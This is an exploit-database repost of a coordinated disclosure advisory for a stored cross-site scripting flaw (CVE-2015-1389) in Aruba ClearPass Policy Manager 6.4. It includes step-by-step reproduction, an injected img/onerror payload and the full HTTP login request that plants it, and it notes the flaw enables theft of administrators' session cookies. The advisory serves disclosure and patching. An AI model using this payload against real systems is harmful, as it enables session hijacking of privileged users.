Aruba ClearPass Policy Manager Stored XSS Vulnerability

ID 1337DAY-ID-23691
Type zdt
Reporter Cristiano Maruti
Modified 2015-06-02T00:00:00


Exploit for php platform in category web applications

                  title: ClearPass Policy Manager Stored XSS
                case id: CM-2014-01
                product: Aruba ClearPass Policy Manager
     vulnerability type: Stored cross-site script
               severity: Medium
                  found: 2014-11-24
                     by: Cristiano Maruti (@cmaruti)
 The analysis discovered a stored cross site scripting vulnerability (OWASP
 OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated
 user is able to inject arbitrary script through the login form that may be
 rendered and triggered later if a privileged authenticated user reviews the
 access audit record.  An attack can use the aforementioned vulnerability to
 effectively steal session cookies of privileged logged on users.
The following version of the Aruba ClearPass Policy Manager was affected by the
vulnerability; previous versions may be vulnerable as well:
- Aruba ClearPass Policy Manager 6.4
It is possible to reproduce the vulnerability following these steps:
1. Open the login page with your browser;
2. Put the  "><img src=x onerror=alert(1337)><" string in the username field
and fill in the password field with a value of your choice;
3. Submit the form;
4. Login to the application with an administrative user:
5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload.
Below a full transcript of the HTTP request used to raise the vulnerability
HTTP Request
POST /tips/tipsLoginSubmit.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
username="><img src=x onerror=alert("0wn3d")><"&password=test
A copy of the report with technical details about the vulnerability I have
identified is available at:
The following CVE ID was allocated to track the vulnerability:
- CVE-2015-1389: Stored cross-site scripting (XSS)
2014-11-24 Vulnerability submitted to vendor through the Bugcrowd
bounty program.
2014-12-09 Vendor acknowledged the problem.
2014-12-10 Researcher requested to publicly disclose the issue.
2015-02-16 Vendor released a fix for the reported issue.
2015-02-09 Vendor asked to hold-on for the public disclosure.
2015-02-22 Vendor postponed the public disclosure date
2015-02-22 Public coordinated disclosure.

# [2018-04-03]  #